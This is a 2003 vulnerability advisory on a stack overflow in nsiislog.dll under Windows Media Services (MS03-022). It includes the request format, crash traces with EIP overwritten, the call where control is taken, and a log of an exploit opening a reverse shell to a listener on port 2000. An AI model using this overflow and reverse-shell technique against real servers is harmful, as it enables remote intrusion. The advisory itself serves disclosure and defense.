Windows Media Services Remote Command Execution #2

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= Windows Media Services Remote Command Execution #2
= MS Bulletin posted: June 25, 2003
= Affected Software:
= 	Microsoft Windows 2000
= Public disclosure on June 25, 2003
= Our Rating: Due to the ease of exploitation of this vulnerability and
= the fact that it allows command execution against a vulnerable server
= we feel that this patch is CRITICAL for all servers that have the 
= vulnerable dll installed even if Windows Media Services are not in use.

A short time after a long time ago, in a place very similar to the last,
where the sun shines, the snow falls and the water is still clean....

Continuing with our 'Methodical Approach To Finding Overflows' against 
nsiislog.dll we discovered another issue but due to complications this
fix was not released with the previous nsiislog.dll bulletin.

== MS03-022 states ==
Impact of vulnerability: Allow an attacker to execute code of their choice 
Maximum Severity Rating: Important

There is a flaw in the way nsiislog.dll processes incoming client requests.
A vulnerability exists because an attacker could send specially formed HTTP
request (communications) to the server that could cause IIS to fail or
execute code on the user's system. 
== MS03-022 ==

== Description ==

Sending a large standard post to nsiislog.dll will cause an access
violation resulting in the following error log.

Event Type:	Warning
Event Source:	W3SVC
Event Category:	None
Event ID:	37
Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly. 

This results in a standard stack based overflow, resulting in EIP
been set to an arbitrary value allowing for remote command execution
with privileges associated with the IWAM_machinename account.

== Standard HTTP Post ==

POST /scripts/nsiislog.dll HTTP/1.1
content-length: <postlength>

<post data>

Using Size: 4354
Connecting....Sending Buffer....
78028E9F   mov al,byte ptr [esi]     ESI = 00B138B4

Using Size: 5000
Connecting....Sending Buffer....
40F01F3B   repne scas byte ptr [edi] EDI = 58585858

Using Size: 25000
Connecting....Sending Buffer....
78005994   mov dword ptr [edi],edx   EDX = 58585858
58585858   ???  illegal op           EIP = 58585858

== Exploitation ==

Commonly referred to as a stack based overflow, control is taken when the
EIP is set to a value from the stack. Widely known and easily exploitable
by using a call or jmp instruction or in the worst case a brute force
technique of direct jumps.

In this case control is taken when a value is obtained from the stack
and then used in a direct call.

77FB98E1   mov         ecx,dword ptr [ebp+18h]
77FB98E4   call        ecx

== Exploit Example ==

** IISNSLOG.DLL - Remote Shell **

. Calling Home: blackhole:2000
. Shellcode Size: 322 bytes
. Preparing Exploit Buffer......Ready
. Starting Listener On Port: 2000
. Connecting To Target
. Sending Exploit......Exploit Sent
. Connection Received
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

== Solutions ==

- Every day is a 0-day day on the Internet. Limiting the avenues of attack
  can be a key factor in reducing the risk to a web server. Programs such
  as secureIIS and URLscan should be setup to reduce the number of methods
  that can be used to send data to a server. Removing unnecessary services,
  files and isapi extensions reduces the number of listeners that data can
  be fed to limiting the number of vulnerabilities that a server is
  susceptible to.
- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft January 30, 2003 by Brett Moore of

%-) viva Las Vegas!!

== About == is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

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